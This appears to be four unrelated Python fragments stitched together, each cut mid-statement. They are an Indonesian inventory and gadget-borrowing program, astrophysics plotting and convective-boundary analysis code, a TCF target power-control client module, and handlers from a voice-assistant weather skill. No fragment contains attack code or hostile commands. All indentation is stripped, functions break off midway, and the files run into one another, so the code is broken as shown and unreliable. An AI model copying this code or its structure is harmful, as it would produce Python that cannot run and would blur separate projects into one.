isInteger = False
while not isInteger:
try:
change = int(input("Masukkan Jumlah: "))
isInteger = True
except:
ValueError
print("Silahkan masukan kembali angka dengan benar")
print()
found = False
indeks_found = None
if id_item[0] == 'G':
for i in range(1, len(gadget)):
if gadget[i][0] == id_item:
found = True
indeks_found = i
if found == True:
break
if indeks_found == None:
print("Tidak ada item dengan ID tersebut!")
else: # indeks_found ada
before = gadget[indeks_found][3]
if before + change < 0:
print(f"{change} {gadget[indeks_found][1]} gagal dibuang karena stok kurang. Stok sekarang: {before} (< {change})")
elif before + change >= 0:
gadget[indeks_found][3] = gadget[indeks_found][3] + change
if change >= 0:
print(f"{change} {gadget[indeks_found][1]} berhasil ditambahkan. Stok sekarang: {gadget[indeks_found][3]}")
elif change < 0:
print(f"{abs(change)} {gadget[indeks_found][1]} berhasil dibuang. Stok sekarang: {gadget[indeks_found][3]}")
elif id_item[0] == 'C':
for i in range(1, len(consumable)):
if consumable[i][0] == id_item:
found = True
indeks_found = i
if found == True:
break
if indeks_found == None:
print("Tidak ada item dengan ID tersebut!")
else: # indeks_found ada
before = consumable[indeks_found][3]
if before + change < 0:
print(f"{change} {consumable[indeks_found][1]} gagal dibuang karena stok kurang. Stok sekarang: {before} (< {change})")
elif before + change >= 0:
consumable[indeks_found][3] = consumable[indeks_found][3] + change
if change >= 0:
print(f"{change} {consumable[indeks_found][1]} berhasil ditambahkan. Stok sekarang: {consumable[indeks_found][3]}")
elif change < 0:
print(f"{abs(change)} {consumable[indeks_found][1]} berhasil dibuang. Stok sekarang: {consumable[indeks_found][3]}")
else:
print("Tidak ada item dengan ID tersebut!")
# ============================ F8 ========================================
def pinjam():
# Meminjam gadget sesuai id_item yang dimasukan dan akan mengurangi jumlah pada gadget dan menambahkan entri pada gadget_borrow_history
# I.S. matriks data gadget dan gadget_borrow_history terdefinisi
# F.S. jumlah gadget pada data gadget berkurang dan terdapat entri baru pada gadget_borrow_history
# KAMUS LOKAL
# id_item, id_peminjaman, data_string : string
# condition, found, syarat_terpenuhi_1, terms : boolean
# indeks, current_amount, amount, a : integer
# personal_borrow : array of string
# ALGORITMA
# Validasi ID_Item
condition = True
while condition:
try:
id_item = input("Masukan ID item: ")
found = False
for i in range(1, len(gadget)):
if gadget[i][0] == id_item:
found = True
condition = False
indeks = i
if found == False:
print("Tidak ada item dengan ID tersebut. Silahkan masukan kembali ID item yang sesuai")
print()
except ValueError:
print()
# Membuat array dari setiap gadget yang user pernah pinjam
personal_borrow = []
for a in range(len(gadget_borrow_history)):
if gadget_borrow_history[a][1] == idUser:
personal_borrow.append(gadget_borrow_history[a])
# Mengecek apakah user pernah meminjam dan belum mengembalikan gadget yang sama atau user belum pernah meminjam sama sekali dari gadget dengan id_item
# Syarat 1: User sudah mengembalikan gadget dengan id_item yang dimasukan secara utuh (tidak sebagian)
syarat_terpenuhi_1 = False
for i in range(len(personal_borrow)-1, 0, -1):
if personal_borrow[i][2] == id_item:
if personal_borrow[i][5] == True:
syarat_terpenuhi_1 = True
break
# Syarat 2: User belum pernah sama sekali meminjam gadget dengan id_item inputan
check = None
for i in range(len(personal_borrow)):
if personal_borrow[i][2] == id_item:
check = 'Checked'
# Jika user sudah pernah mengembalikan secara lengkap gadget dengan id = id_item (atau) gadget dengan id = id item belum pernah ia pinjam sama sekali
if syarat_terpenuhi_1 == True or check == None:
# Validasi Tanggal
kondisi = True
while(kondisi):
format = "%d/%m/%Y"
date_string = input("Tanggal peminjaman: ")
cond = False
if len(date_string) == 10:
cond = True
if cond == False:
while(True):
print("Masukan tanggal dengan benar, yakni 2 digit tanggal, 2 digit bulan, dan 4 digit tahun dan format DD/MM/YYYY")
date_string = input("Tanggal peminjaman: ")
if len(date_string) == 10:
cond = True
break
try:
datetime.datetime.strptime(date_string, format)
break
except ValueError:
print("Tanggal yang anda masukan salah. Silahkan masukan kembali tanggal dengan format DD/MM/YYYY")
# Validasi jumlah
current_amount = gadget[indeks][3]
terms = True
while(terms):
try:
amount = int(input("Jumlah peminjaman: "))
if (amount <= current_amount) and (amount > 0):
gadget[indeks][3] = current_amount - amount
print(f"Item {gadget[indeks][1]} (x{amount}) berhasil dipinjam!")
print()
terms = False
else:
print(f"Jumlah yang anda ingin pinjam melebihi yang ada dalam stok penyimpanan atau anda memasukan angka di bawah 1. Silahkan masukan kembali jumlah yang ingin dipinjam dengan maksimal meminjam {current_amount}")
except ValueError:
print("Silahkan masukan kembali jumlah dengan angka yang benar")
# Memasukan ke data gadget_borrow_history
id_peminjaman = 'GBH' + str(len(gadget_borrow_history))
gadget_borrow_history.append([id_peminjaman, idUser, id_item, date_string, amount, False])
# Kondisi jika user pernah meminjam gadget dengan id = id_item, namun belum mengembalikannya
else:
print("Maaf, anda pernah meminjam gadget yang sama dan belum mengembalikannya, anda harus mengembalikan secara keseluruhan gadget yang baru saja anda ingin pinjam")
print()
# Referensi
# https://www.kite.com/python/answers/how-to-validate-a-date-string-format-in-python
# ============================ F9 + FB02 ========================================
def kembalikan():
# Mengembalikan gadget yang pernah dipinjam baik sebagian maupun keseluruhan
# I.S. matriks data gadget, gadget_borrow_history, dan gadget_return_history terdefinisi
# F.S. jumlah gadget pada data gadget berkurang dan terdapat entri baru pada gadget_borrow_history
# KAMUS LOKAL
# id_returned_gadget, id_pengembalian, tanggal : string
# syaratnya : boolean
# option, indeksnya, markernya, max_returned, total_amount_returned, total_amount_returned_updated, amount_returned, z, n, an : integer
# personal_borrow_not_return, updated_unique_personal_borrow_not_returned : array of string
# unique_personal_borrow_not_returned : set of string
# ALGORITMA
# Menampilkan ke user gadget yang pernah ia pinjam
personal_borrow_not_returned = []
for a in range(len(gadget_borrow_history)):
if gadget_borrow_history[a][1] == idUser and gadget_borrow_history[a][5] == False:
personal_borrow_not_returned.append(gadget_borrow_history[a][2])
unique_personal_borrow_not_returned = set(personal_borrow_not_returned)
updated_unique_personal_borrow_not_returned = list(unique_personal_borrow_not_returned)
# Kondisi jika user pernah meminjam barang sebelumnya
if len(updated_unique_personal_borrow_not_returned) > 0:
# Menampilkan setiap gadget yang pernah dipinjam oleh user
for i in range(len(updated_unique_personal_borrow_not_returned)):
for j in range(len(gadget)):
syaratnya = False
if updated_unique_personal_borrow_not_returned[i] == gadget[j][0]:
print(f"{i + 1}. {gadget[j][1]}")
syaratnya = True
break
if not syaratnya: # jika gadget ada yang dihapus dan sedang dipinjam
print(str(i+1) + ". " + updated_unique_personal_borrow_not_returned[i] + " (entry telah dihapus dari database gadget, tidak bisa dikembalikan)")
updated_unique_personal_borrow_not_returned[i] = "False"
# Meminta user memilih opsi item sesuai nomor
banyak = len(updated_unique_personal_borrow_not_returned)
syaratnya = True
while(syaratnya):
try:
option = int(input("Masukan nomor peminjaman: "))
if option > 0 and option <= banyak:
syaratnya = False
if updated_unique_personal_borrow_not_returned[option - 1] == "False":
print("Tidak dapat mengembalikan gadget yang telah dihapus")
return # jika gadget ada yang dihapus dan sedang dipinjam, Asumsi tidak dapat dikembalikan
except ValueError:
print("Silahkan masukan kembali nomor dengan benar")
# Meminta user memasukan tanggal dan memvalidasinya
kondisi = True
while(kondisi):
format = "%d/%m/%Y"
date_string = input("Tanggal pengembalian: ")
cond = False
if len(date_string) == 10:
cond = True
if cond == False:
while(True):
print("Masukan tanggal dengan benar, yakni 2 digit tanggal, 2 digit bulan, dan 4 digit tahun dan format DD/MM/YYYY")
date_string = input("Tanggal pengembalian: ")
if len(date_string) == 10:
cond = True
break
try:
datetime.datetime.strptime(date_string, format)
break
except ValueError:
print("Tanggal yang anda | |
pl.gca().xaxis.set_visible(False)
pl.ylabel('colour index')
if horizontal:
cbar = pl.colorbar(orientation='horizontal', ticks = colour_index_ticks)
cbar.ax.set_xticklabels(ticks*scale_factor)
else:
cbar = pl.colorbar(ticks = colour_index_ticks)
cbar.ax.set_yticklabels(ticks*scale_factor)
cbar.solids.set_edgecolor('face')
cbar.ax.tick_params(axis='both', which='both',length=0,labelsize=6)
pl.draw()
return cbar
def cmap_from_str(str, segment=None):
points = []
for line in str.splitlines():
parts = line.split()
if (len(parts) == 5) and (parts[0] == 'Cnot:'):
points.append(parts[1:])
points = np.array(points, dtype=np.float)
points = points[points[:,0].argsort()]
if segment is not None:
# Index of the first point with value > segment[0].
idx0 = np.argmax(points[:, 0] > segment[0])
if idx0 > 0:
t = (float(segment[0]) - points[idx0 - 1, 0])/ \
(points[idx0, 0] - points[idx0 - 1, 0])
new_point = (1. - t)*points[idx0 - 1, :] + t*points[idx0, :]
points = np.vstack([new_point, points[idx0:, :]])
# Index of the first point with value > segment[1].
idx1 = np.argmax(points[:, 0] > segment[1])
if idx1 > 0:
t = (float(segment[1]) - points[idx1 - 1, 0])/ \
(points[idx1, 0] - points[idx1 - 1, 0])
if t > 0.:
new_point = (1. - t)*points[idx1 - 1, :] + t*points[idx1, :]
points = np.vstack([points[0:idx1, :], new_point])
else:
points = points[0:idx1, :]
p0 = points[0, 0]
p1 = points[-1, 0]
for i in range(points.shape[0]):
points[i, 0] = (points[i, 0] - p0)/(p1 - p0)
r = np.zeros((points.shape[0], 3))
r[:, 0] = points[:, 0]
r[:, 1] = points[:, 1]
r[:, 2] = points[:, 1]
g = np.zeros((points.shape[0], 3))
g[:, 0] = points[:, 0]
g[:, 1] = points[:, 2]
g[:, 2] = points[:, 2]
b = np.zeros((points.shape[0], 3))
b[:, 0] = points[:, 0]
b[:, 1] = points[:, 3]
b[:, 2] = points[:, 3]
cmap_points = {'red': r, 'green': g, 'blue': b}
cmap = LinearSegmentedColormap('my_cmap', cmap_points)
return cmap
###########################################################
# Additional plotting methods Jericho
###########################################################
def analyse_dump(rp, r1, r2):
'''
This function analyses ray profiles of one dump and returns
r, ut, dutdr, r_ub,
Parameters
----------
rp : radial profile
radial profile
r1 : float
minimum radius for the search for r_ub
r2 : float
maximum radius for the search for r_ub\
Returns
------
r : array
radius
ut : array
RMS tangential velocity profiles for all buckets (except the 0th)
dutdr : array
radial gradient of ut for all buckets (except the 0th)
r_ub : array
radius of the upper boundary as defined by the minimum in dutdr
for all buckets (except the 0th).
'''
n_buckets = rp.get('nbuckets')
r = rp.get_table('y')
dr = 0.5*(np.roll(r, -1) - np.roll(r, +1))
idx1 = np.argmin(np.abs(r - r1))
idx2 = np.argmin(np.abs(r - r2))
ekt = rp.get_table('ekt')
ut = ekt[0, :, 1:n_buckets+1]**0.5
dut = 0.5*(np.roll(ut, -1, axis = 0) - np.roll(ut, +1, axis = 0))
dutdr = np.transpose(np.array([dut[:, i]/dr for i in range(n_buckets)]))
idx_min_dutdr = [idx1 + np.argmin(dutdr[idx1:idx2 + 1, i]) \
for i in range(n_buckets)]
r_ub = np.zeros(n_buckets)
for bucket in range(n_buckets):
idx = idx_min_dutdr[bucket]
r_min = r[idx] # 0th-order estimate
# try to fit a parabola around r_min
r_fit = r[idx-1:idx+2]
dutdr_fit = dutdr[idx-1:idx+2, bucket]
coefs = np.polyfit(r_fit, dutdr_fit, 2)
# hopefully we can determine the position of the minimum from the fit
if coefs[0] != 0:
r_min = -coefs[1]/(2.*coefs[0])
# go back to 0th order if something has gone awry with the fit
if r_min < r[idx -1] or r_min > r[idx + 1]:
r_min = r[idx]
r_ub[bucket] = r_min
return r, ut, dutdr, r_ub
def upper_bound_ut(data_path, dump_to_plot, hist_dump_min,
hist_dump_max, r1, r2, ylims = None, derivative = False, silent = True):
'''
Finds the upper convective boundary as defined by the steepest decline in
tangential velocity.
Subpolot(1) plots the tangential velocity as a function of radius for a single dump and
displays the convective boundary
Subplot(2) plots a histogram of the convective boundaries for a range of dumps specified by
user and compares them to the selected dump
Plots Fig. 14 or 15 in paper: "Idealized hydrodynamic simulations
of turbulent oxygen-burning shell convection in 4 geometry"
by <NAME>.; <NAME>.; <NAME>.; <NAME>.; <NAME>.; <NAME>.
NASA ADS: http://adsabs.harvard.edu/abs/2017MNRAS.465.2991J
Parameters
----------
derivative : bool
True = plot dut/dr False = plot ut
dump_To_plot : int
The file number of the dump you wish to plot
hist_dump_min/hist_dump_max = int
Range of file numbers you want to use in the histogram
r1/r2 : float
This function will only search for the convective
boundary in the range between r1/r2
Examples
--------
.. ipython::
In [136]: data_path = '/data/ppm_rpod2/RProfiles/AGBTP_M2.0Z1.e-5/F4/'
.....: dump = 560; hist_dmin = dump - 1; hist_dmax = dump + 1
.....: r_lim = (27.0, 30.5)
@savefig upper_bound.png width=6in
In [136]: ppm.upper_bound_ut(data_path,dump, hist_dmin, hist_dmax,r1 = r_lim[0],r2 = 31, derivative = False,ylims = [1e-3,19.])
'''
cb = utils.colourblind
rp_set = bprof.rprofile_set(data_path)
rp = rp_set.get_dump(dump_to_plot)
nr = len(rp.get('y'))
sparse = 1
dumps = np.array([rp_set.dumps[i] for i in range(0, len(rp_set.dumps), sparse)])
n_dumps = len(dumps)
n_buckets = rp_set.get_dump(rp_set.dumps[0]).get('nbuckets')
t = np.zeros(n_dumps)
r_ub = np.zeros((n_buckets, n_dumps))
ut = np.zeros((nr, n_buckets, n_dumps))
dutdr = np.zeros((nr, n_buckets, n_dumps))
for k in range(n_dumps):
rp = rp_set.get_dump(rp_set.dumps[k])
t[k] = rp.get('time')
res = analyse_dump(rp, r1, r2)
r = res[0]
ut[:, :, k] = res[1]
dutdr[:, :, k] = res[2]
r_ub[:, k] = res[3]
avg_r_ub = np.sum(r_ub, axis = 0)/float(n_buckets)
dev = np.array([r_ub[i, :] - avg_r_ub for i in range(n_buckets)])
sigmap_r_ub = np.zeros(n_dumps)
sigmam_r_ub = np.zeros(n_dumps)
idx = np.argmin(np.abs(dumps - dump_to_plot))
for k in range(n_dumps):
devp = dev[:, k]
devp = devp[devp >= 0]
if len(devp) > 0:
sigmap_r_ub[k] = (sum(devp**2)/float(len(devp)))**0.5
else:
sigmam_r_ub[k] = None
devm = dev[:, k]
devm = devm[devm <= 0]
if len(devm) > 0:
sigmam_r_ub[k] = (sum(devm**2)/float(len(devm)))**0.5
else:
sigmam_r_ub[k] = None
hist_bins = 0.5*(r + np.roll(r, -1))
hist_bins[-1] = hist_bins[-2] + (hist_bins[-2] - hist_bins[-3])
#hist_bins = np.insert(hist_bins, 0., 0.) # #robert - this command throws an error?!?
if not silent:
print("Dump {:d} (t = {:.2f} min).".format(dump_to_plot, t[dump_to_plot]/60.))
print("Histogram constructed using dumps {:d} (t = {:.2f} min) to {:d} (t = {:.2f} min) inclusive."\
.format(hist_dump_min, t[hist_dump_min]/60., hist_dump_max, t[hist_dump_max]/60.))
fig = pl.figure( figsize = (2*3.39, 2*2.8))
#fig = pl.figure( figsize = (2*5, 2*4))
gs = gridspec.GridSpec(2, 1, height_ratios = [3, 1])
ax0 = pl.subplot(gs[0])
if derivative:
temp = dutdr
lims = (-0.49, 0.1)
else:
temp = 1e3*ut
lims = (-9.99, 70)
ax0.set_ylim(lims)
for bucket in range(n_buckets):
lbl = r'bucket data' if bucket == 0 else None
ax0.plot(r, temp[:, bucket, idx], ls = '-', lw = 0.5, color = cb(3), \
label = lbl)
lines = (min(lims) + (max(lims)- min(lims))/13.3 ,\
min(lims) + (max(lims)- min(lims))/13.3 + (max(lims)- min(lims))/30)
lbl = r'steepest decline'
lbl = lbl if bucket == 0 else None
ax0.plot((r_ub[bucket, dump_to_plot], r_ub[bucket, dump_to_plot]), lines, \
ls = '-', lw = 0.5, color = cb(4), label = lbl)
ax0.axvline(x = avg_r_ub[dump_to_plot], ls = '--', lw = 1., color = cb(4), label = 'average')
ax0.axvline(x = avg_r_ub[dump_to_plot] - 2*sigmam_r_ub[dump_to_plot], ls = ':', lw = 1., \
color = cb(4), label = '2$\sigma$ fluctuations')
ax0.axvline(x = avg_r_ub[dump_to_plot] + 2*sigmap_r_ub[dump_to_plot], ls = ':', lw = 1., color = cb(4))
ax0.set_xlim((r1 - 0.4, r2))
if ylims is not None:
ax0.set_ylim(ylims)
ax0.set_ylabel(r'v$_{\!\perp}$ / km s$^{-1}$')
yticks = ax0.yaxis.get_major_ticks()
yticks[0].label1.set_visible(False)
ax0.legend(loc = 3, frameon = False)
#ax0.autoscale(enable=True, axis='y', tight=True)
ax1 = pl.subplot(gs[1])
ax1.hist(r_ub[:, hist_dump_min:hist_dump_max+1].flatten(), bins = hist_bins, \
log = True, color = cb(3), edgecolor = cb(4), lw = 0.5)
ax1.axvline(x = avg_r_ub[dump_to_plot], ls = '--', lw = 1., color = cb(4))
ax1.axvline(x = avg_r_ub[dump_to_plot] - 2*sigmam_r_ub[dump_to_plot], ls = ':', lw = 1., color = cb(4))
ax1.axvline(x = avg_r_ub[dump_to_plot] + 2*sigmap_r_ub[dump_to_plot], ls = ':', lw = 1., color = cb(4))
ax1.set_xlim((r1 - 0.4, r2))
#ax1.set_ylim((4e-1, 4e3))
ax1.set_xlabel(r'r / Mm')
ax1.set_ylabel(r'N')
ax1.minorticks_off()
fig.subplots_adjust(hspace = 0)
pl.setp([a.get_xticklabels() for a in fig.axes[:-1]], visible = False)
def get_avg_rms_velocities(prof, dumps, comp):
'''
Finds an average velocity vector as a function of radius for a given
range of dumps. To find a velocity vector as a function of radius see
get_v_evolution().
Parameters
----------
yprof : yprofile instance
profile to examine
dumps : range
dumps to average over
comp : string
component to use 'r':'radial','t':'tangential','tot':'total'
'''
avg_rms_v = 0.
for d in dumps:
if comp == 'tot':
rms_v = np.sqrt(2.*prof.get('Ek', | |
<reponame>jhaapako/tcf
#! /usr/bin/python3
#
# Copyright (c) 2017 Intel Corporation
#
# SPDX-License-Identifier: Apache-2.0
#
"""
Power on or off the target or any its power rail components
-----------------------------------------------------------
This module implements the client side API for controlling the power's
target as well as the hooks to access these interfaces from the
command line.
"""
import collections
import json
import re
import commonl
from . import tc
from . import msgid_c
class extension(tc.target_extension_c):
"""
Extension to :py:class:`tcfl.tc.target_c` to interact with the
server's power control interface.
Use as:
>>> target.power.on()
>>> target.power.off()
>>> target.power.cycle()
>>> target.power.get()
>>> target.power.list()
"""
def __init__(self, target):
if 'power' in target.rt.get('interfaces', []):
return
raise self.unneeded
def get(self):
"""
Return a target's power status, *True* if powered, *False*
otherwise.
A target is considered *on* when all of its power rail
components are on; fake power components report power state as
*None* and those are not taken into account.
A more detailed picture of the target's power state can be
obtained with :meth:list.
"""
state, _, _ = self.list()
return state
def list(self):
# FIXME: add component to make it faster when we only need one component
"""
Return a list of a target's power rail components and their status
:returns tuple(state, substate, data):
- state: *True* on, *False* off, *None* not available
- substate: "normal", "full", "inconsistent"; if
inconsistent, it would be a good idea to power cycle
- data: dictionary keyed by
component name listing their state and other flags about
them:
.. code-block:: python
{
"NAME1": {
"state": STATE1,
["explicit": "on|off|both" ]
},
"NAME2": {
"state": STATE2,
["explicit": "on|off|both" ]
},
...
}
- *state*: *True* if powered, *False* if not, *None* if not
applicable, for fake power controls
- *explicit*: (see :ref:`ttbd_power_explicit`) if missing,
not explicit, will be turned on/off normally:
- *on*: only powered on if explicitly named
- *off*: only powered off if explicitly named
- *both*: only powered on/off if explicitly named
"""
self.target.report_info("listing", dlevel = 2)
r = self.target.ttbd_iface_call(
"power", "list", method = "GET",
# extra time, since power ops can take long
timeout = 60)
if 'power' in r:
data = collections.OrderedDict()
# backwards compat
#
## [
## [ NAME1, STATE2 ],
## [ NAME2, STATE2 ],
## ...
## ]
#
for i in r.get('power', []):
data[i[0]] = dict(state = i[1])
substate = 'normal' # older doesn't support substates
state = all(i['state'] in (True, None) for i in list(data.values()))
elif isinstance(r, collections.Mapping):
# proper response format
#
## {
## NAME1: { state: STATE1, [explicit: "on|off|both" ] },
## NAME2: { state: STATE2, [explicit: "on|off|both" ] },
## ...
## }
#
# FIXME: verify the format
state = r['state']
substate = r['substate']
data = r['components']
else:
raise AssertionError("can't parse response")
self.target.report_info("listed", dlevel = 2)
return state, substate, data
@staticmethod
def _estimated_duration_get(data, operation):
return data.get(
'estimated_duration_%s' % operation,
data.get('estimated_duration', 0))
@staticmethod
def _compute_duration(target, component, operation):
timeout = 0
if component:
data = target.rt.get('interfaces', {})\
.get('power', {})\
.get(component, None)
if data:
timeout += extension._estimated_duration_get(data, operation)
else:
# collect all the timeouts from the different components
# to get an estimate on what to wait
for name, data in target.rt.get('interfaces', {})\
.get('power', {})\
.items():
if isinstance(data, dict):
# components are dictionaries, the rest are not components
timeout += extension._estimated_duration_get(data, operation)
return timeout
def off(self, component = None, explicit = False):
"""
Power off a target or parts of its power rail
:param str component: (optional) name of component to
power off, defaults to whole target's power rail
"""
if component != None:
assert isinstance(component, str)
component_s = f" component {component}"
else:
component_s = ""
assert isinstance(explicit, bool)
target = self.target
target.report_info("powering off" + component_s, dlevel = 1)
timeout = 60 + self._compute_duration(target, component, "off")
if timeout > 120:
target.report_info(
"WARNING: long power-off--estimated duration %s seconds"
% timeout)
target.ttbd_iface_call(
"power", "off", component = component, explicit = explicit,
timeout = timeout)
target.report_info("powered off" + component_s)
def on(self, component = None, explicit = False):
"""
Power on a target or parts of its power rail
:param str component: (optional) name of component to
power on, defaults to whole target's power rail
"""
if component != None:
assert isinstance(component, str)
component_s = f" component {component}"
else:
component_s = ""
assert isinstance(explicit, bool)
target = self.target
target.report_info("powering on" + component_s, dlevel = 1)
timeout = 60 + self._compute_duration(target, component, "on")
if timeout > 120:
target.report_info(
"WARNING: long power-on--estimated duration %s seconds"
% timeout)
target.ttbd_iface_call(
"power", "on", component = component, explicit = explicit,
# extra time, since power ops can take long
timeout = timeout)
target.report_info("powered on" + component_s)
if hasattr(target, "console"):
target.console._set_default()
def cycle(self, component = None, wait = None, explicit = False):
"""
Power cycle a target or one of its components
:param float wait: (optional) seconds to wait before powering on
:param str component: (optional) name of component to
power-cycle, defaults to whole target's power rail
"""
assert wait == None or wait >= 0
if component != None:
assert isinstance(component, str)
component_s = f" component {component}"
else:
component_s = ""
assert isinstance(explicit, bool)
target = self.target
target.report_info("power cycling" + component_s, dlevel = 1)
timeout = 60 \
+ self._compute_duration(target, component, "on") \
+ self._compute_duration(target, component, "off")
if timeout > 120:
target.report_info(
"WARNING: long power-cycle--estimated duration %s seconds"
% timeout)
target.ttbd_iface_call(
"power", "cycle",
component = component, wait = wait, explicit = explicit,
timeout = timeout)
target.report_info("power cycled" + component_s)
if hasattr(target, "console"):
target.console._set_default()
def reset(self):
"""
Reset a target
This interface is **deprecated**.
"""
self.target.report_info("resetting", dlevel = 1)
self.target.report_info("DEPRECATED: reset()", level = 0)
# reset is deprecated at the server level
self.target.ttbd_iface_call(
"power", "cycle",
# extra time, since power ops can take long
timeout = 60)
self.target.report_info("reset")
if hasattr(self.target, "console"):
self.target.console._set_default()
def sequence(self, sequence, timeout = None):
"""
Execute a sequence of power actions on a target
:param str sequence: a list of pairs:
>>> ( OPERATION, ARGUMENT )
*OPERATION* is a string that can be:
- *on*, *off* or *cycle*; *ARGUMENT* is a string being:
- *all*: do the operation on all the components except
:ref:`explicit <ttbd_power_explicit>` ones
- *full*: perform the operation on all the components
including the :ref:`explicit <ttbd_power_explicit>` ones
- *COMPONENT NAME*: perform the operation only on the given
component
- *wait*: *ARGUMENT* is a number describing how many seconds
to wait
For example:
>>> [ ( 'off', 'full' ), ( 'wait', 2 ), ( 'on', 'all' ) ]
powers off every single component of the power rail, waits
two seconds and then powers on all the components needed for
normal system's power on.
:param float timeout: (optional) maximum seconds to wait
before giving up; default is whatever calculated based on
how many *wait* operations are given or if none, whatever
the default is set in
:meth:`tcfl.tc.target_c.ttbd_iface_call`.
"""
kwargs = {}
if timeout != None:
kwargs['timeout'] = timeout
# FIXME: compute length for timeout
self.target.report_info("running sequence: %s" % (sequence, ), dlevel = 1)
self.target.ttbd_iface_call("power", "sequence", method = "PUT",
sequence = sequence, **kwargs)
self.target.report_info("ran sequence: %s" % (sequence, ))
def _healthcheck(self):
target = self.target
target.power.off()
power = target.power.get()
if power != False:
raise tc.failed_e("power should be False, reported %s" % power)
target.report_pass("power is reported correctly as %s" % power)
target.power.on()
power = target.power.get()
state, substate, components = target.power.list()
if power != True:
raise tc.failed_e("power should be True, reported %s" % power,
dict(state = state, substate = substate,
components = components, power = power))
target.report_pass("power is reported correctly as %s" % power)
target.power.cycle()
components = target.power.list()
target.report_pass("power components listed",
dict(components = components))
target.power.off()
power = target.power.get()
if power != False:
raise tc.failed_e("power should be False, reported %s" % power)
target.report_pass("power is reported correctly as %s" % power)
def _cmdline_power_off(args):
tc.tc_global = tc.tc_c("cmdline", "", "builtin")
tc.report_driver_c.add( # FIXME: hack console driver
tc.report_console.driver(0, None))
with msgid_c("cmdline"):
for target_name in args.targets:
target = tc.target_c.create_from_cmdline_args(
args, target_name, iface = "power",
extensions_only = [ 'power' ])
target.power.off(args.component, explicit = args.explicit)
def _cmdline_power_on(args):
tc.tc_global = tc.tc_c("cmdline", | |
handle_three_day_forecast(self, message):
try:
report = self.__initialize_report(message)
self.report_threeday_forecast(report)
except HTTPError as e:
self.__api_error(e)
except Exception as e:
LOG.exception("Error: {0}".format(e))
# Handle: What is the weather forecast?
@intent_handler(IntentBuilder("").require(
"Forecast").optionally("Location").build())
def handle_forecast(self, message):
try:
report = self.__initialize_report(message)
# Get a date from spoken request
when = extract_datetime(message.data.get('utterance'),
lang=self.lang)[0]
self.report_forecast(report, when)
except HTTPError as e:
self.__api_error(e)
except Exception as e:
LOG.exception("Error: {0}".format(e))
def __get_requested_unit(self, message):
""" Get selected unit from message.
Arguments:
message (Message): messagebus message from intent service
Returns:
'fahrenheit', 'celsius' or None
"""
if 'Unit' in message.data:
if self.voc_match(message.data['Unit'], 'Fahrenheit'):
return 'fahrenheit'
else:
return 'celsius'
else:
return 'celsius'
@intent_handler(IntentBuilder("").require("Query").require(
"Temperature").optionally("Location").optionally("Unit").build())
def handle_current_temperature(self, message):
return self.__handle_typed(message, 'temperature')
@intent_handler(IntentBuilder("").require("Query").require("High") \
.optionally("Temperature").optionally("Location") \
.optionally("Unit").build())
def handle_high_temperature(self, message):
return self.__handle_typed(message, 'high.temperature')
@intent_handler(IntentBuilder("").require("Query").require("Low") \
.optionally("Temperature").optionally("Location") \
.optionally("Unit").build())
def handle_low_temperature(self, message):
return self.__handle_typed(message, 'low.temperature')
@intent_handler(IntentBuilder("").require("ConfirmQuery").require(
"Windy").optionally("Location").build())
def handle_isit_windy(self, message):
""" Handler for utterances similar to "is it windy today?" """
report = self.__populate_report(message)
if self.__get_speed_unit() == 'mph':
limits = WINDSTRENGTH_MPH
report['wind_unit'] = self.translate('miles per hour')
else:
limits = WINDSTRENGTH_MPS
report['wind_unit'] = self.translate('meters per second')
dialog = []
if 'day' in report:
dialog.append('forecast')
if "Location" not in message.data:
dialog.append('local')
if int(report['wind']) >= limits['hard']:
dialog.append('hard')
elif int(report['wind']) >= limits['medium']:
dialog.append('medium')
else:
dialog.append('light')
dialog.append('wind')
dialog = '.'.join(dialog)
report['wind'] = pronounce_number(int(report['wind']), self.lang)
self.speak_dialog(dialog, report)
@intent_handler(IntentBuilder("").require("ConfirmQuery").one_of(
"Hot", "Cold").optionally("Location").build())
def handle_isit_hot(self, message):
""" Handler for utterances similar to
is it hot today?, is it cold? will it be hot tomorrow?, etc
"""
return self.__handle_typed(message, 'hot')
@intent_handler(IntentBuilder("").require("ConfirmQuery").one_of(
"Snowing").optionally("Location").build())
def handle_isit_snowing(self, message):
""" Handler for utterances similar to "is it snowing today?"
"""
report = self.__populate_report(message)
if self.voc_match(report['condition'], 'Snowing'):
dialog = 'affirmative.condition'
elif self.voc_match(report['condition'], 'SnowAlternatives'):
dialog = 'snowing.alternative'
else:
dialog = 'no.snow.predicted'
if "Location" not in message.data:
dialog = 'local.' + dialog
if report.get('day'):
dialog = 'forecast.' + dialog
self.speak_dialog(dialog, report)
@intent_handler(IntentBuilder("").require("ConfirmQuery").one_of(
"Clear").optionally("Location").build())
def handle_isit_clear(self, message):
""" Handler for utterances similar to "is it clear skies today?"
"""
report = self.__populate_report(message)
if self.voc_match(report['condition'], 'Clear'):
dialog = 'affirmative.condition'
elif self.voc_match(report['condition'], 'ClearAlternatives'):
dialog = 'clear.alternative'
else:
dialog = 'no.clear.predicted'
if "Location" not in message.data:
dialog = 'local.' + dialog
if report.get('day'):
dialog = 'forecast.' + dialog
self.speak_dialog(dialog, report)
@intent_handler(IntentBuilder("").require("ConfirmQuery").one_of(
"Cloudy").optionally("Location").build())
def handle_isit_cloudy(self, message):
""" Handler for utterances similar to "is it clear skies today?"
"""
report = self.__populate_report(message)
if self.voc_match(report['condition'], 'Cloudy'):
dialog = 'affirmative.condition'
elif self.voc_match(report['condition'], 'CloudyAlternatives'):
dialog = 'cloudy.alternative'
else:
dialog = 'no.cloudy.predicted'
if "Location" not in message.data:
dialog = 'local.' + dialog
if report.get('day'):
dialog = 'forecast.' + dialog
self.speak_dialog(dialog, report)
@intent_handler(IntentBuilder("").require("ConfirmQuery").one_of(
"Foggy").optionally("Location").build())
def handle_isit_foggy(self, message):
""" Handler for utterances similar to "is it foggy today?"
"""
report = self.__populate_report(message)
if self.voc_match(report['condition'], 'Foggy'):
dialog = 'affirmative.condition'
elif self.voc_match(report['condition'], 'FoggyAlternatives'):
dialog = 'fog.alternative'
else:
dialog = 'no.fog.predicted'
if "Location" not in message.data:
dialog = 'local.' + dialog
if report.get('day'):
dialog = 'forecast.' + dialog
self.speak_dialog(dialog, report)
@intent_handler(IntentBuilder("").require("ConfirmQuery").one_of(
"Raining").optionally("Location").build())
def handle_isit_raining(self, message):
""" Handler for utterances similar to "is it snowing today?"
"""
report = self.__populate_report(message)
if self.voc_match(report['condition'], 'Raining'):
dialog = 'affirmative.condition'
elif self.voc_match(report['condition'], 'RainAlternatives'):
dialog = 'raining.alternative'
else:
dialog = 'no.rain.predicted'
if "Location" not in message.data:
dialog = 'local.' + dialog
if report.get('day'):
